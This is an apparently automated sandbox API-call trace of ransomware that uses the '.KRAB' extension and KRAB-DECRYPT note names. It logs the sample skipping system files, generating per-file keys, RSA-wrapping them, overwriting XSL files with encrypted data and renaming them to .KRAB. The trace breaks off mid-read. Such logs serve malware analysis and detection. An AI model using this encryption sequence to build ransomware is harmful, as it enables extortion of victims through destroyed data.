[0058.060] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.060] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 95 [0058.060] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a08d2ca4dee3d.lock") returned 90 [0058.060] lstrlenW (lpString=".lock") returned 5 [0058.060] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.060] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0058.060] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.060] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.061] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.061] lstrcmpW (lpString1="GB.XSL", lpString2=".") returned 1 [0058.061] lstrcmpW (lpString1="GB.XSL", lpString2="..") returned 1 [0058.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="GB.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" [0058.061] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.061] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.KRAB") returned 78 [0058.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0058.061] lstrlenW (lpString=".XSL") returned 4 [0058.061] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.061] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".XSL ") returned 5 [0058.061] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0058.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="desktop.ini") returned 1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="autorun.inf") returned 1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="ntuser.dat") returned -1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="iconcache.db") returned -1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="bootsect.bak") returned 1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="boot.ini") returned 1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="ntuser.dat.log") returned -1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="thumbs.db") returned -1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="ntldr") returned -1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="NTDETECT.COM") returned -1 [0058.062] lstrcmpiW (lpString1="GB.XSL", lpString2="Bootfont.bin") returned 1 [0058.062] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.062] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb770) returned 1 [0058.063] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.063] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.063] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.063] CryptGenRandom (in: hProv=0xfbb770, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.063] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0058.063] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.064] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbbc38) returned 1 [0058.064] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.064] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.065] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.065] CryptGenRandom (in: hProv=0xfbbc38, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.065] CryptReleaseContext (hProv=0xfbbc38, dwFlags=0x0) returned 1 [0058.065] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.065] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbbb0) returned 1 [0058.065] CryptImportKey (in: hProv=0xfbbbb0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd960) returned 1 [0058.065] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.066] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.066] GetLastError () returned 0x0 [0058.066] CryptDestroyKey (hKey=0xfbd960) returned 1 [0058.066] CryptReleaseContext (hProv=0xfbbbb0, dwFlags=0x0) returned 1 [0058.066] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb880) returned 1 [0058.066] CryptImportKey (in: hProv=0xfbb880, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd4a0) returned 1 [0058.066] CryptGetKeyParam (in: hKey=0xfbd4a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.066] CryptEncrypt (in: hKey=0xfbd4a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.067] GetLastError () returned 0x0 [0058.067] CryptDestroyKey (hKey=0xfbd4a0) returned 1 [0058.067] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0058.067] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.067] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.068] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.068] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x4197e, lpOverlapped=0x0) returned 1 [0058.096] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffbe682, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.096] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x4197e, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x4197e, lpOverlapped=0x0) returned 1 [0058.096] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.096] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.103] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.104] CloseHandle (hObject=0x448) returned 1 [0058.114] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.114] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl.krab")) returned 1 [0058.115] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.115] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.115] lstrcmpW (lpString1="GostName.XSL", lpString2=".") returned 1 [0058.115] lstrcmpW (lpString1="GostName.XSL", lpString2="..") returned 1 [0058.115] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="GostName.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" [0058.115] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.116] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.KRAB") returned 84 [0058.123] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0058.123] lstrlenW (lpString=".XSL") returned 4 [0058.123] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.123] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".XSL ") returned 5 [0058.124] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0058.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="desktop.ini") returned 1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="autorun.inf") returned 1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="ntuser.dat") returned -1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="iconcache.db") returned -1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="bootsect.bak") returned 1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="boot.ini") returned 1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="ntuser.dat.log") returned -1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="thumbs.db") returned -1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="ntldr") returned -1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="NTDETECT.COM") returned -1 [0058.124] lstrcmpiW (lpString1="GostName.XSL", lpString2="Bootfont.bin") returned 1 [0058.124] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.125] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb220) returned 1 [0058.125] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.126] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.126] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.126] CryptGenRandom (in: hProv=0xfbb220, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.126] CryptReleaseContext (hProv=0xfbb220, dwFlags=0x0) returned 1 [0058.126] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.126] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc100) returned 1 [0058.127] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.127] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.127] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.127] CryptGenRandom (in: hProv=0xfbc100, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.127] CryptReleaseContext (hProv=0xfbc100, dwFlags=0x0) returned 1 [0058.127] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.128] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbee0) returned 1 [0058.131] CryptImportKey (in: hProv=0xfbbee0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd4e0) returned 1 [0058.131] CryptGetKeyParam (in: hKey=0xfbd4e0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.131] CryptEncrypt (in: hKey=0xfbd4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.132] GetLastError () returned 0x0 [0058.132] CryptDestroyKey (hKey=0xfbd4e0) returned 1 [0058.132] CryptReleaseContext (hProv=0xfbbee0, dwFlags=0x0) returned 1 [0058.132] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbc078) returned 1 [0058.132] CryptImportKey (in: hProv=0xfbc078, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd260) returned 1 [0058.132] CryptGetKeyParam (in: hKey=0xfbd260, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.132] CryptEncrypt (in: hKey=0xfbd260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.133] GetLastError () returned 0x0 [0058.133] CryptDestroyKey (hKey=0xfbd260) returned 1 [0058.133] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0058.133] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.134] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.135] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.135] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x3e966, lpOverlapped=0x0) returned 1 [0058.161] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffc169a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.161] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x3e966, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x3e966, lpOverlapped=0x0) returned 1 [0058.162] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.162] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.165] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.166] CloseHandle (hObject=0x448) returned 1 [0058.173] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.174] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl.krab")) returned 1 [0058.175] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.175] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.175] lstrcmpW (lpString1="GostTitle.XSL", lpString2=".") returned 1 [0058.175] lstrcmpW (lpString1="GostTitle.XSL", lpString2="..") returned 1 [0058.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="GostTitle.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" [0058.175] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.175] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.KRAB") returned 85 [0058.176] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0058.176] lstrlenW (lpString=".XSL") returned 4 [0058.176] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.176] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".XSL ") returned 5 [0058.176] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.176] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0058.176] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0058.176] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="desktop.ini") returned 1 [0058.176] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="autorun.inf") returned 1 [0058.176] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="ntuser.dat") returned -1 [0058.176] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="iconcache.db") returned -1 [0058.176] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="bootsect.bak") returned 1 [0058.176] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="boot.ini") returned 1 [0058.177] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="ntuser.dat.log") returned -1 [0058.177] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="thumbs.db") returned -1 [0058.177] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0058.177] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0058.177] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.177] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="ntldr") returned -1 [0058.177] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="NTDETECT.COM") returned -1 [0058.177] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="Bootfont.bin") returned 1 [0058.177] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.177] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb990) returned 1 [0058.178] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.178] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.178] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.178] CryptGenRandom (in: hProv=0xfbb990, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.178] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0058.178] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.179] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb550) returned 1 [0058.179] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.179] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.180] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.180] CryptGenRandom (in: hProv=0xfbb550, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.180] CryptReleaseContext (hProv=0xfbb550, dwFlags=0x0) returned 1 [0058.180] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.180] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbaa0) returned 1 [0058.180] CryptImportKey (in: hProv=0xfbbaa0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd2e0) returned 1 [0058.181] CryptGetKeyParam (in: hKey=0xfbd2e0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.181] CryptEncrypt (in: hKey=0xfbd2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.181] GetLastError () returned 0x0 [0058.181] CryptDestroyKey (hKey=0xfbd2e0) returned 1 [0058.181] CryptReleaseContext (hProv=0xfbbaa0, dwFlags=0x0) returned 1 [0058.181] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbf68) returned 1 [0058.182] CryptImportKey (in: hProv=0xfbbf68, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd5a0) returned 1 [0058.182] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.182] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.182] GetLastError () returned 0x0 [0058.182] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0058.182] CryptReleaseContext (hProv=0xfbbf68, dwFlags=0x0) returned 1 [0058.182] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.183] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.184] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.184] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, 